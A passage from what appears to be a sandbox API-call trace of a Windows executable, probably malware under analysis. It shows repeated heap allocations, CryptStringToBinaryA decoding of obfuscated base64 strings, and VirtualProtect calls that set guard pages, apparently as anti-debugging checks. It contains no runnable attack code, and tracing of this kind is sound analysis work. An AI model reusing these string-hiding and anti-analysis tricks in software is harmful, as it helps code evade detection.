pszString="WRCFYe6VFStPKQ7hTdvDPDI1L/o=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.216] CryptStringToBinaryA (in: pszString="WRCFYe6VFStPKQ7hTdvDPDI1L/o=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.216] GetProcessHeap () returned 0x5b0000 [0181.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6830 [0181.216] VirtualProtect (in: lpAddress=0x5c6830, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.216] GetProcessHeap () returned 0x5b0000 [0181.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5c59a8 [0181.216] CryptStringToBinaryA (in: pszString="TBCWZ/WSCgVEJAPuXA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.216] CryptStringToBinaryA (in: pszString="TBCWZ/WSCgVEJAPuXA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.216] GetProcessHeap () returned 0x5b0000 [0181.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5f70 [0181.216] VirtualProtect (in: lpAddress=0x5c5f70, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.216] GetProcessHeap () returned 0x5b0000 [0181.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c32a8 [0181.217] CryptStringToBinaryA (in: pszString="XQeUQ++CIw1g", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.217] CryptStringToBinaryA (in: pszString="XQeUQ++CIw1g", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.217] GetProcessHeap () returned 0x5b0000 [0181.217] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6a60 [0181.217] VirtualProtect (in: lpAddress=0x5c6a60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.217] GetProcessHeap () returned 0x5b0000 [0181.217] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c3008 [0181.217] CryptStringToBinaryA (in: pszString="WRCFZv6RDi1EHifmbg==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.217] CryptStringToBinaryA (in: pszString="WRCFZv6RDi1EHifmbg==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.217] GetProcessHeap () returned 0x5b0000 [0181.217] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6b78 [0181.217] VirtualProtect (in: lpAddress=0x5c6b78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.217] GetProcessHeap () returned 0x5b0000 [0181.217] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c3020 [0181.217] CryptStringToBinaryA (in: pszString="XQeUQ++CJCFMLSfidMvAPx8a", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.217] CryptStringToBinaryA (in: pszString="XQeUQ++CJCFMLSfidMvAPx8a", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.217] GetProcessHeap () returned 0x5b0000 [0181.217] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6ec0 [0181.217] VirtualProtect (in: lpAddress=0x5c6ec0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.218] GetProcessHeap () returned 0x5b0000 [0181.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5c5988 [0181.218] CryptStringToBinaryA (in: pszString="XQeUQ++CJCFMLSfidMvAPxkwPtbMxA==", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.218] CryptStringToBinaryA (in: pszString="XQeUQ++CJCFMLSfidMvAPxkwPtbMxA==", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.218] GetProcessHeap () returned 0x5b0000 [0181.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6600 [0181.218] VirtualProtect (in: lpAddress=0x5c6600, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.218] GetProcessHeap () returned 0x5b0000 [0181.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5c5a68 [0181.218] CryptStringToBinaryA (in: pszString="TRCdR/iTKCxLOCXi", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.218] CryptStringToBinaryA (in: pszString="TRCdR/iTKCxLOCXi", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.218] GetProcessHeap () returned 0x5b0000 [0181.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7ac8 [0181.218] VirtualProtect (in: lpAddress=0x5c7ac8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.218] GetProcessHeap () returned 0x5b0000 [0181.218] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5c32c0 [0181.218] CryptStringToBinaryA (in: pszString="XByFYPeT", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.219] CryptStringToBinaryA (in: pszString="XByFYPeT", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.219] GetProcessHeap () returned 0x5b0000 [0181.219] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5c28 [0181.219] VirtualProtect (in: lpAddress=0x5c5c28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.219] GetProcessHeap () returned 0x5b0000 [0181.219] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bed90 [0181.219] CryptStringToBinaryA (in: pszString="WhCdR++CKCxLOCXi", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.219] CryptStringToBinaryA (in: pszString="WhCdR++CKCxLOCXi", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.219] GetProcessHeap () returned 0x5b0000 [0181.219] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6c90 [0181.219] VirtualProtect (in: lpAddress=0x5c6c90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.219] GetProcessHeap () returned 0x5b0000 [0181.219] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5c33b0 [0181.219] CryptStringToBinaryA (in: pszString="TQGDR++EDwxNKQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.219] CryptStringToBinaryA (in: pszString="TQGDR++EDwxNKQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.219] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c5d40 [0181.220] VirtualProtect (in: lpAddress=0x5c5d40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.220] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5c3380 [0181.220] CryptStringToBinaryA (in: pszString="WRCFbfmNAi1VCg==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.220] CryptStringToBinaryA (in: pszString="WRCFbfmNAi1VCg==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.220] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6088 [0181.220] VirtualProtect (in: lpAddress=0x5c6088, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.220] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5c32f0 [0181.220] CryptStringToBinaryA (in: pszString="WRCFZtKlDjpS", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.220] CryptStringToBinaryA (in: pszString="WRCFZtKlDjpS", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.220] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c61a0 [0181.220] VirtualProtect (in: lpAddress=0x5c61a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.220] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c3398 [0181.220] CryptStringToBinaryA (in: pszString="TRSHR9+k", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.220] CryptStringToBinaryA (in: pszString="TRSHR9+k", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.220] GetProcessHeap () returned 0x5b0000 [0181.220] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7320 [0181.220] VirtualProtect (in: lpAddress=0x5c7320, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.221] GetProcessHeap () returned 0x5b0000 [0181.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bee80 [0181.221] CryptStringToBinaryA (in: pszString="XQeUQ++CIwdjDiP1acDDNA==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.221] CryptStringToBinaryA (in: pszString="XQeUQ++CIwdjDiP1acDDNA==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.221] GetProcessHeap () returned 0x5b0000 [0181.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7550 [0181.221] VirtualProtect (in: lpAddress=0x5c7550, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.221] GetProcessHeap () returned 0x5b0000 [0181.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5888 [0181.221] CryptStringToBinaryA (in: pszString="WhCdR++CIw0=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.221] CryptStringToBinaryA (in: pszString="WhCdR++CIw0=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.221] GetProcessHeap () returned 0x5b0000 [0181.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6948 [0181.221] VirtualProtect (in: lpAddress=0x5c6948, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.221] GetProcessHeap () returned 0x5b0000 [0181.221] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5c3308 [0181.221] CryptStringToBinaryA (in: pszString="TBCCVvSVAgpi", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.221] CryptStringToBinaryA (in: pszString="TBCCVvSVAgpi", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6da8 [0181.222] VirtualProtect (in: lpAddress=0x5c6da8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c3320 [0181.222] CryptStringToBinaryA (in: pszString="WgajTfeCICtVDTT/cMjeIx82J9rE2iDadetnRryqK93F", cchString=0x2c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] CryptStringToBinaryA (in: pszString="WgajTfeCICtVDTT/cMjeIx82J9rE2iDadetnRryqK93F", cchString=0x2c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c6fd8 [0181.222] VirtualProtect (in: lpAddress=0x5c6fd8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x22) returned 0x5c7c08 [0181.222] CryptStringToBinaryA (in: pszString="WRCFb/SDEiJEGy/6eOfNNz4cMvo=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] CryptStringToBinaryA (in: pszString="WRCFb/SDEiJEGy/6eOfNNz4cMvo=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c70f0 [0181.222] VirtualProtect (in: lpAddress=0x5c70f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5c5968 [0181.222] CryptStringToBinaryA (in: pszString="XQeIUu+yCT5TMjLzft3oOy84", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] CryptStringToBinaryA (in: pszString="XQeIUu+yCT5TMjLzft3oOy84", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.222] GetProcessHeap () returned 0x5b0000 [0181.222] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7780 [0181.222] VirtualProtect (in: lpAddress=0x5c7780, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5c5a88 [0181.223] CryptStringToBinaryA (in: pszString="XDaDW+uTJCJOLiPXcc7DKDItItb9xgbCeuBwWQ==", cchString=0x28, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.223] CryptStringToBinaryA (in: pszString="XDaDW+uTJCJOLiPXcc7DKDItItb9xgbCeuBwWQ==", cchString=0x28, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7898 [0181.223] VirtualProtect (in: lpAddress=0x5c7898, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1d) returned 0x5c7c38 [0181.223] CryptStringToBinaryA (in: pszString="XDaDW+uTIytSKTT5ZOLJIw==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.223] CryptStringToBinaryA (in: pszString="XDaDW+uTIytSKTT5ZOLJIw==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7208 [0181.223] VirtualProtect (in: lpAddress=0x5c7208, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c59c8 [0181.223] CryptStringToBinaryA (in: pszString="XDaDW+uTKD5EMwf6esbeMy8xJ+vf2x/dd+Fn", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.223] CryptStringToBinaryA (in: pszString="XDaDW+uTKD5EMwf6esbeMy8xJ+vf2x/dd+Fn", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7438 [0181.223] VirtualProtect (in: lpAddress=0x5c7438, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.223] GetProcessHeap () returned 0x5b0000 [0181.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5c7c60 [0181.224] CryptStringToBinaryA (in: pszString="XDaDW+uTNCtVDTT5bczeLiI=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.224] CryptStringToBinaryA (in: pszString="XDaDW+uTNCtVDTT5bczeLiI=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.224] GetProcessHeap () returned 0x5b0000 [0181.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c79b0 [0181.224] VirtualProtect (in: lpAddress=0x5c79b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.224] GetProcessHeap () returned 0x5b0000 [0181.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5c59e8 [0181.224] CryptStringToBinaryA (in: pszString="XDaDW+uTICtPODT3acz/IzY0L8/f3Qr/dv0=", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.224] CryptStringToBinaryA (in: pszString="XDaDW+uTICtPODT3acz/IzY0L8/f3Qr/dv0=", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.224] GetProcessHeap () returned 0x5b0000 [0181.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8688 [0181.224] VirtualProtect (in: lpAddress=0x5c8688, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.224] GetProcessHeap () returned 0x5b0000 [0181.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1b) returned 0x5c9c90 [0181.224] CryptStringToBinaryA (in: pszString="XDaDW+uTIytCLz/maQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.224] CryptStringToBinaryA (in: pszString="XDaDW+uTIytCLz/maQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.224] GetProcessHeap () returned 0x5b0000 [0181.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9920 [0181.225] VirtualProtect (in: lpAddress=0x5c9920, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.225] GetProcessHeap () returned 0x5b0000 [0181.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c3338 [0181.225] CryptStringToBinaryA (in: pszString="SBSETu+oFytPCyfjcd0=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.225] CryptStringToBinaryA (in: pszString="SBSETu+oFytPCyfjcd0=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, 